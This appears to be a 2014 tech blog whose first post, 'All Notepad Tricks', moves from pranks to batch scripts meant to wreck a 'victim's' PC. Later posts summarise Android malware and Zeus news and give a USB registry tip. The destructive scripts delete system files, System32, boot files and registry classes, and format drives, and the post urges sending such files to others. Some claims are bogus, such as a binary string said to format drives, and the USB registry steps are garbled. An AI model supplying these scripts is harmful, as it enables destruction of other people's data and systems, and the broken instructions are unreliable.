Wednesday 31 December 2014

ALL NOTEPAD TRICKS . .


REJECTED NUTS

#1 Bush Hid the Facts – Most Popular Notepad Tricks

This is one of the mysterious notepad tricks we know. According to the trick it really seems Microsoft had put some hack into the coding of notepad making the text hidden after saving it.
Bush Hid the Facts – Most Popular Notepad Trick Open notepad.

Type BUSH HID THE FACTS
Save that file.

Close it

Open It Again See…

Why This Happens ? : It was later known 4335 Rule. It means that if we enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters each, and the last word has five letters. Then Notepad Automatically hides the text into unknown code. Similar are with “this app can break”.

OR

STEP 1: OPEN NOTEPAD
STEP 2: WRITE FOLLOWING LINE IN THE NOTEPAD.
THIS APP CAN BREAK
STEP 3: SAVE THIS FILE AS AAA.TXT
STEP 4: CLOSE THE NOTEPAD.
STEP 5: OPEN THE FILE AGAIN.

VOILLA!!

OR

1> OPEN NOTEPAD

2> ENTER FOUR WORDS SEPARATED BY SPACES, WHEREIN THE FIRST WORD HAS 4 LETTERS, THE NEXT TWO HAVE THREE LETTERS, AND THE LAST WORD HAS FIVE LETTERS

3> DON’T HIT ENTER AT THE END OF THE LINE.

4> SAVE THE FILE.

5> CLOSE NOTEPAD.

6> REOPEN NOTEPAD.

7> OPEN THE FILE YOU JUST SAVED.

YOU ARE DONE!!!




#2 World Trade Centre Attack Trick – Shocking Notepad Tricks

Did you know that the flight number of the plane that had hit WTC on 9/11 was Q33NY …
Open your Notepad

Type the flight number i.e Q33N in Capital Letters.

Increase the Font Size to 72

Change the Font to Wingdings

You will be amazed by the findings. Its a Plane going for 2 building shaped structures & then death.(see below) WTF ?

Must Be Shocking Right.

But This Is Only Hoax As No Plane No:-Q33N Crashed Into Twin Towers.





#3. Test Your Anti-Virus

You can also test your anti virus program for its effectiveness using a simple notepad trick. Follow the steps below to know more:

Open Notepad.

Copy the code give below in the notepad file:

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Save it with an .exe extension like testvirus.exe

This test is also known as EICAR (European Institute for Computer Antivirus Research) test file.
The file is simply a text file of either 68 or 70 bytes that is a legitimate executable file called a COM file that can be run by Microsoft operating systems and some work-alikes (except for 64-bit due to 16-bit limitations), including OS/2. When executed, it will print “EICARSTANDARD- ANTIVIRUS-TEST-FILE!” and then stop. 

The test string was specifically engineered to consist of ASCII human-readable characters, easily created using a standard computer keyboard. It makes use of self-modifying code to work around technical issues that this constraint makes on the execution of the test string.




#4. Continually Pop The CD Drive

Open Notepad.

Copy the code given below onto the notepad file:

Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


Save it as “Anything.VBS”.

Now open the file and see the magic! The file will continuously force the CD rom to pop out! And If you have more than one then it pops out all of them!

Note: Don’t worry when this crazy notepad trick opens your cd tray continuously. If you want to end this script simply Open Task Manager(Alt+Ctrl+Delete). Under Processes end the process “wscript.exe”



#5.Convert Text Into Audio Using Notepad

How To Do It ?

Open Notepad file on your Windows PC.

Copy and paste the below mentioned code :

Dim msg, sapi
msg=InputBox(“Enter your text for conversion–www.techvorm.com”,”TechVorm Text-To-Audio Converter”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak msg

Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs

Thats it ! Your Text to Audio converter is ready to be used. Now open the saved file and key in the text you want to convert and click OK.

If you find any difficulties in using this code, let me know via comments section.





#6. Matrix Effect

Not much to explain, just follow the steps and see the amazing matrix effect happen in your DOS window:

Open Notepad.

Copy the below mentioned text in your notepad file:

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Save the file with .bat extension like Matrix.bat
Thats it. Just open the file to see the matrix effect right before your eyes!




#7. Change The Header/Footer Of Your Notepad File

More often than not whenever you get a printout of your notepad file, it starts with “Untitled” or the filename at top, and “Page ” on bottom. Now if you want to get rid of it or want to change it, just follow the simple steps given below.

Open Notepad.

Click on File -> Page Setup.
Replace the text written in the “Header” and “Footer” box (as shown above) by any of the following codes:
&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number






#8. Constantly Repeat Messages

Using this notepad trick you can annoy anyone and can actually force them to log off or leave the computer (LOL….). This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:

Open Notepad.

Paste the following code in the notepad file:

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

Save the file with any file name but with .bat as extension and close it. For eg. Freakymessage.bat
After saving the file just open it (by double clicking) and see what happens.





#9. Shut-down The Computer After Conveying Any Message

This one is kind of an annoying trick and if used unknowingly can certainly cause problems (am serious). What this trick does is, after conveying a (any) message it shuts down the computer without any confirmation. In order to create the Shutdown file, follow the below mentioned steps:

Open Notepad.

Paste the following code in it:

@echo off
msg * Its time to get some rest.
shutdown -c “Error! You have to take rest! Byeeeeee” -s
Save the file with any name but with .bat extension and close it. For eg. TakeRest.bat





#10. Toggle Keyboard Button Simultaneously

Using Notepad (and VB) you can set different keys on your keyboard to toggle continuously. Following are the 3 tricks using which different keys can be set to toggle simultaneously. Follow the steps given under each head to try out the tricks.

1. Caps Lock Key

Open Notepad.

Paste the following code in the notepad file:

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

Save the file with anyname and .vbs extension. and close it.
Now open the newly created file and see how the caps lock key behaves on your keyboard!


2. Hit Enter Key Continuously

Open Notepad.

Paste the following code in the notepad file:

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save the file with any name and .vbs extension and close it.
Now open the newly created file and see how the enter key behaves!


3. Hit Backspace Key Continuously

Open Notepad.

Paste the following code in the notepad file:

MsgBox “Lets Rumble”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


Save the file with any name and with .vbs extension and close it.
Now open the newly created file and see how the key behaves!




#12. Type “You are a fool” Continuously

Not much to explain, the title says it all! Follow the steps to make this trick work:

Open Notepad.

Paste the following code in the notepad file:

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save the file with any name but with .vbs extension and close it.
Ope the file and see how it makes you type!



#13. Open Notepad continuously

Open Notepad.

Paste the following code in your notepad file:

@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top

Save the file with any name nut with .bat extension and close it.
Now open the file and see how it annoys you by opening notepad again and again.




#14. Pick Your Option Batch File

When used this creates a file which asks you to choose a number between 1-5 and then does a certain action (as shown below – Action
accompanied by number):

1 – Shut’s down the computer
2 – Restart’s the computer
3 – Wipes out the hard drive
4 – Net send
5 – Shows a message & then shut’s down the computer

Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one else’s on which you are running
this file) computer system. So BEWARE! In order to create the file, follow the steps given below:

Open Notepad.

Paste the following code in the notepad file:

@echo off
title Get A Life
cd C:
:menu
cls

echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC
will be formatted. Do not cry if you loose your data or anything.

pause
echo Pick your option:
echo 1. Die Slowly
echo 2. Instant Death
echo 3. Stay Away From This One
echo 4. Die this way (For Wimps!)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save the file with any name and with a .bat extension and close the file.





#15. IN THIS HACK I WILL SHOW YOU HOW TO FORMAT A HDD USING NOTEPAD AND HOW TO DESTROY VICTIMS PC USING

NOTEPAD. THIS IS REALLY COOL.

(A) STEP 1 :-

COPY THE FOLLOWING IN NOTEPAD EXACTLY AS IT IS.

SAYS01001011000111110010010101010101010000011111100000

STEP 2 :-

SAVE AS AN .EXE ANY NAME WILL DO

STEP 3 :-

SEND THE .EXE TO PEOPLE AND INFECT

OR

IF YOU THINK CANNOT FORMAT C DRIVE WHEN WINDOWS IS RUNNING TRY LAUGHING AND U WILL GET IT Secret. ANY WAY SOME

MORE SO U CAN TEST ON OTHER DRIVES THIS IS SIMPLE BINARY CODE
FORMAT C:\ /Q/X — THIS WILL FORMAT YOUR DRIVE C:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000

FORMAT D:\ /Q/X — THIS WILL FORMAT YOUR DIRVE D:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000

FORMAT A:\ /Q/X — THIS WILL FORMAT YOUR DRIVE A:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000

DEL /F/S/Q C:\BOOT.INI — THIS WILL CAUSE YOUR COMPUTER NOT TO BOOT.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001

TRY TO FIGURE OUT URSELF REST

CANT SPOONFEED
\
ITS WORKING

DO NOT TRY IT ON YOUR PC. DON’T MESS AROUND THIS IS FOR EDUCATIONAL PURPOSE ONLY

STILL IF YOU CANT FIGURE IT OUT TRY THIS

GO TO NOTEPAD AND TYPE THE FOLLOWING:

(B) @ECHO OFF
DEL C:\ *.*|Y

SAVE IT AS DELL.BAT

WANT WORSE THEN TYPE THE FOLLOWING:

@ECHO OFF
DEL %SYSTEMDRIVE%\*.*/F/S/Q
SHUTDOWN -R -F -T 00

AND SAVE IT AS A .BAT FILE

(C) HOW TO SHUTDOWN A COMPUTER FOREVER..
CODE:

@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI

OPEN UP AND COPY THE CODE AND SAVE IT AS .BAT FILE..
THIS WILL SHUT DOWN THE PERSON’S COMPUTER.IT SHUTS IT OFF ONCE AND DELETES THE FILES NEEDED TO REBOOT AND
RESTART.

REMEMBER – DO NOT OPEN THE FILE.

YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

(D) A SIMPLE HACK TO DESTROY UR VICTIM’S PC

I M HERE EXPLAIN TO MAKE A FILE THAT DESTROYS UR VICTIMS PC

I M NOT RESPONSIBLE FOR THE DAMAGE CAUSED BY THIS FILE.”

1. OPEN NOTEPAD

2. WRITE THE ABOVE COMMAND : -

DEL C:\WINDOWS\SYSTEM32\*.*/Q

3. SAVE THE ABOVE NOTEPAD WITH THE EXTENSION “.BAT OR .CMD” AS U WANT

4. !!!!!!!!!!!!!!!!!!!!!!ATTENTION!!!!!!!!!!!!!!!!!!! !!!

55 THOUGHTS ON “ALL NOTEPAD TRICKS.”

DON’T DOUBLE CLICK THE FILE OTHERWISE U R IN TROUBLE.

WHY ?????? BCZ THE FILE U CREATED DELETE ALL FILES FROM UR SYSTEM32 FOLDER AND WHEN U RESTART UR PC IT WILL NOT START BCZ SYSTEM CAN NOT FIND THE FILES IN THE SYSTEM32 FOLDER WHICH IS REQUIRED AT THE TIME OF BOOTING.


5. YOU CAN ALSO TEST THE ABOVE BY CREATING A FAKE FOLDER LET SUPPOSE
WINDOWS1 IN C:\. COPY SOME OLD FILES IN IT AND JUST FOLLOW THE ABOVE COMMAND.BY DOUBLE CLICKING THE BAT OR CMD FILE UR ALL FILES AUTOMAITCALLY GET DELETED.


6. YOU CAN TRY THIS FILE IN ANY ONE`S COMPUTER.(BUT THIS RESULT IN CAUSING DAMAGE TO THE COMPUTER, SO THINK AGAIN BEFORE TRYING THIS ON ANYONE’S PC)

***MOST DANGEROUS NOTEPAD TRICK***

OPEN NOTEPAD

TYPE:

@ECHO OFF
START REG DELETE
HKCR/ .EXE
START REG DELETE
HKCR/.DLL
START REG DELETE HKCR/*
:MESSAGE
ECHO YOUR COMPUTER HAS
BEEN FCKED.HAVE A
NICE DAY.
GOTO MESSAGE

Tuesday 30 December 2014

SECURITY CONCEPTS :- EBOOK FOR FREE

This is a free book about computer, network, technical, physical, information and cryptographic security. You can download it as a pdf file.
Description:-
I wrote this paper to try and examine the typical problems in computer security and related areas, and attempt to extract from them principles for defending systems. To this end I attempt to synthesize various fields of knowledge, including computer security, network security, cryptology, and intelligence. I also attempt to extract the principles and implicit assumptions behind cryptography and the protection of classified information, as obtained through reverse-engineering (that is, informed speculation based on existing regulations and stuff I read in books), where they are relevant to technological security.
         Table of Contents
  1. Metadata
  2. Security Properties
  3. Security Models
  4. Security Concepts
  5. Economics of Security
  6. Adversary Modeling
  7. Threat Modeling
  8. Physical Security
  9. Hardware Security
  10. Distributed Systems
  11. Identification and Authentication
  12. Authorization – Access Control
  13. Secure System Administration
  14. Logging
  15. Reporting
  16. Abuse Detection
  17. Abuse Response
  18. Forensics
  19. Privacy
  20. Intrusion Response
  21. Network Security
  22. Email Security
  23. Web Security
  24. Software Security
  25. Human Factors and Usability
  26. Attack PatternsTrust and Personnel Security
  27. Cryptography
  28. Randomness and Unpredictability
  29. Cryptanalysis
  30. Lateral Thinking
  31. Information and Intelligence
  32. Conflict and Combat
  33. Security Principles
  34. Common Arguments
  35. Editorials, Predictions, Polemics, and Personal Opinions
Book Details :-
Author(s): Theodore Parker
Format(s): PDF, HTML
File size: 1.83 MB
Number of pages: 246
Download Link-:   Security_Concepts

New ‘Fakedebuggerd’ vulnerability in Android 4.x OS lets hackers root access


New ‘Fakedebuggerd’ vulnerability in all versions of Android OS upto lollipop, lets hackers root access Security Researchers at Chinese antivirus company 360 have found out a new vulnerability in the Google’s Android operating system which is named as ‘Fakedebuggerd.’ This new vulnerability allows potential hackers to gain root access to install files and escalate privileges on the smartphones and tablets running on Android OS and run malicious codes at will.

As per the 360 researchers, the Fakedebuggerd vulnerability enables a potential attacker to access an
area that can be accessed only with system or root permissions. The vulnerability uses two known
Android 4.x Privilege Escalation (PE) exploits, ‘FramaRoot’ and ‘TowelRoot’, to run code under root
privileges and to install a root toolkit on the device. This allows the potential hacker to hide the code both from the Android user as well as the security solutions running on the devices. As such the hacker may inject any malicious App without users notice.



Fakedebuggerd targets Android 4.x devices

The vulnerability is of high risk as it gives serious privilege escalation to the handlers of malware and this is the first time the researchers have found out any Privilege Escalation vulnerabilities in Android 4.x. As said above, uses two exploits, TowelRoot’ and ‘FramaRoot’ together which means it has a higher rate of infection as well as higher chances of hiding itself from the AV engines aboard the users device. The Towelroot exploit is based on the futex() syscall vulnerability (CVE20143153).


This Linux vulnerability was discovered five months ago by Comex and affects almost all Android devices prior to Android 5.0 lollipop. The other exploit, Framaroot, is basically a rooting tool and based on several exploits for most Samsung, LG, Huawei, Asus and ZTE devices and more. The exploits which form the Framaroot are named after heroes of the popular JRR Tolkein triolgoy “The Lord of the Rings,” like Gandalf, Boromir, Pippin, Legolas, Sam, Frodo, Aragorn and Gimli. Almost all Android smartphones which are made by the above companies are able to execute Framaroot quite easily which makes Fakedebggerd very powerful vector.



Modus Operandi Once the Fakedebuggerd vulnerability is exploited and the root toolkit is deployed on the infected device, malicious code to collects sensitive data like unique identifiers, device versions and network connectivity data. Additionally it will install unnecessary Apps like Flashlight and Calender without the users permission.
The Fakedbuggerd is quite aggressive in its intent and uses extreme measures to keep them installed.
As of now no security solution or antivirus can detect this malware, therefore precaution is the best remedy against getting infected through this vulnerability. Stay away from thirdparty and unverified APKs and use the official Google Play Apps for download. 
Even if you have to download a APK, stick with trusted and wellreviewed app developers. Beware fake advertisements (malvertisements) and phishing links on all forms of communication –SMS, email and social networks.



Even if these Apps are removed by user using root privileges, the Fakedbuggerd reinstalls them automatically using the PE exploit. And as said above due the malware’s perfect hiding technique, simply deleting the suspicious apps wont work in this case. The Fakedbuggerd malware is a serious threat because of its ability to access root privileges and run malware laden codes on infected devices. In today’s world of convergence when the critical and confidential enterprise data and mobile phones are interconnected, Fakebuggerd can cause havoc unseen before. 

The Gameover Trojan ‘Zeus’ program is back



Cyber criminals are trying to create a new botnet based on what is likely a modification of Gameover Zeus, a sophisticated Trojan program whose command-and-control infrastructure was taken over by law enforcement agencies at the beginning of decemeber.


The Gameover Zeus malware is designed to steal log-in credentials, as well as personal and Financial information from users when they access banking and other popular websites.
According to the U.S. Federal Bureau of Investigation, which took part in the Gameover botnet takedown, the Trojan program infected more than a million computers globally and led to losses of over US$100 million.


Disrupting the original botnet required special techniques and the assistance of security vendors, because unlike most Trojan programs, which use a limited number of servers and domain names for command and control, Gameover had a peer-to-peer architecture that didn’t o4er a single point of failure and allowed infected computers to update each other.


The malware also had a backup mechanism that relied on a domain name generation algorithm (DGA) to ensure that computers can receive commands even when they got disconnected from the peer-to-peer network. Through this mechanism the malware generated random-looking domain names at certain time intervals and tried to access
them. Attackers were able to predict which domain names the bots will generate on a certain day, and could register one of those domains in advance to issue commands.


On Thursday, more than a month after the takedown, researchers from Malcovery Security spotted several email spam campaigns distributing a Trojan program that appears to be heavily based on the Gameover Zeus binary. The modification no longer relies on a peer-to-peer infrastructure and uses a DGA as the primary command-and-control mechanism.


“Malcovery analysts confirmed with the FBI and Dell SecureWorks that the original GameOver Zeus is still ‘locked down’,” the Malcovery researchers said Thursday in a blog post. “This new DGA list is not related to the original GameOver Zeus but bears a striking resemblance to the DGA utilized by that Trojan.”


In addition to the DGA similarity, the list of URLs and strings used by the new Trojan program to decide what sites to target matches the one used by the old Gameover botnet.
“This discovery indicates that the criminals responsible for GameOver’s distribution do not intend to give up on this botnet even after su4ering one of the most expansive botnet takeovers/takedowns in history,” the Malcovery researchers said.

Monday 29 December 2014

HOW TO STOP PENDRIVES FROM GETTING UNWANTED VIRUS

Today, A big problem for windows user is to secure their data from viruses. Especially, in Pendrives, no one wants to keep their important data in pendrives because pendrives are portable devices and during sharing data it may get infected by virus like Shortcut virus, Autorun.inf , and new folder virus etc.
Some people recover their data by simply using Command prompt but some people think there is only option left and it is to format the flash drive.
well! if your pendrive is infected by any of these virus you can simply follow these step to get your hidden data back.
  • Open CMD (command prompt)
  • Open Flash drive in cmd ( if your drive is ‘G’ than enter ‘G:’ after c:\user\ press [ENTER] )
  • Now type following line and press enter:
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlStorageDevicePolicies] “WriteProtect”=dword:00000001
That’s it your USB is now sheltered
To TURN DEFENCE OFF
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlStorageDevicePolicies]
attrib -s -h /s /d
Now open your flash drive in windows you will see all your files . but wait ! is it enough ? No way! your flash drive is still not fully secure . Above command just shows all your files that are hidden by viruses. If you desire to protect your USB from getting unwanted files i.e. virus, worm, spy, Trojan etc than follow these steps. What I’m gonna tell you is that how to setup your registry to end a computer from saving files to your USB (It’ll block all of them) If you have windows 7 or windows 8 then you can immobilize the writing option to USB drives. This trick is very helpful if you have virus in your computer and desire to copy files from a USB Drive but don’t desire to transfer virus to the USB. Follow the given steps to disable the USB writing option:
Open notepad and copy and paste the following:
Windows Registry Editor Version 5.00
Now keep the file with the extension “.reg”.
Click on the file you presently saved. In the pop-up window chose YES and then OK.

Open notepad and copy and paste the following:
Windows Registry Editor Version 5.00
“WriteProtect”=dword:00000000
Now put aside the file with the extension “.reg”.
Click on the file you presently saved. In the pop-up window click YES and then OK.
That’s it your defense is now disabled.                                 

Sunday 28 December 2014

Check who use your PC in your Absence . .

       CHECK WHO USE YOUR PC IN YOUR ABSENCE

Rejected Nuts - These days generally some people log in to our pc and check photos and other data or any other useful information without our permission, and we always don't want anybody to access our pc without our permission which most of the people like to do. if you want to know the details than when was your pc accessed then I am here to show you how can you check that who logged on to your pc.
Into Windows, there is one in-built too will records all events in your computer called“Event Viewer”. This application records all your computer activities from login tolog off etc.The Event Viewer can be accessed in all Windows Operating system includingWindows XP, Vista, Windows 7 and Windows 8.Here, I”ll show you how to find the login events in Windows 8. To open the EventViewer, type the eventvwr.msc in Run Command (Open run command Press Win +R Keys ) and press enter or go to Command prompt and type eventvwr.msc and press enter.Now the Event Viewer utility will open, and many logs will be shown to you. To get login events of you computer click Windows logs -> System in the left panel.

The System log will show all the logs from kernel, Wireless network service start.
There you can also find out the login event “Winlogon”. Just click the login event
to display the properties of that event in the panel below.
In the properties, you can get the much needed information such as Login time,
user account, event ID.

Note :
If you have found that someone has accessed your computer, change your user
password immediately with complex one and scan your computer with Best
Antivirus applications and Anti-malware security applications, remove threats if
you found.

Beware: Fake 'The Interview' App Affects Android Users


"The Interview", the controversial North Korean-baiting film which appeared to be the root cause of the cyber mishap occurred at Sony Pictures Entertainment that threatened terror attack at theaters showing the movie, now threatens to expose users of Android phones to a malware attack.

Since its release, everyone is talking about "The Interview" — the Seth Rogen and James Franco-starring comedy centered around a TV host and his producer assassinating North Korean dictator Kim Jong Un. Because cybercriminals are known to take advantage of major events where there is a high level of public interest, The Interview became their target.

In a joint investigation, Security researchers of McAfee and Technische Universität Darmstadt and the Center for Advanced Security Research Darmstadt (CASED) has discovered an Android app claiming to download 'The Interview' comedy on their smartphone devices actually infects users’ devices with banking trojan in order to steal their financial information.

The Banking Trojan is appeared to be hosted on Amazon Web Services and is delivered via a torrent file. Researchers have identified that the malware campaign is targeting Android users in South Korea and is active from the last few days. The campaign is attempting to exploit the popularity of The Interview movie that triggered tension over its release on Christmas.

The malware trojan, detected by the researchers at McAfee as Android/Badaccents, targets customers of some Korean banks as well as an international bank, Citi Bank. According to researchers, the Trojan is selective about its victims and avoids infection of devices sold in North Korea.
"One aspect which will probably raise eyebrows, is that the malware code includes a routine to check the device’s manufacturing information," Graham Cluley wrote on his blog. "If it is set to either 삼지연 (Samjiyon) or 아리랑 (Arirang), smartphone manufacturers whose Android devices are sold in North Korea, the malware will not infect, and instead display a message that an attempt to connect to the server failed."
The researchers' findings cited by Cluley revealed that at least 20,000 devices have been infected and that the information exfiltrated from the devices is uploaded to a Chinese mail server.

Security researchers at McAfee has notified Amazon Web Security about the malware hosting issue so that the Amazon-hosted files can be removed and prevent further infections. However, other online storage services could be used by cyber criminals for carrying out the campaign.

Usually cybercriminals use third party Android app to distribute trojan malware in order to infect smartphone users, but this is the first time when cyber crooks have chosen torrent websites to deliver the Trojan, probably because "The Interview" is already at the top of search results in Korea and most of the countries.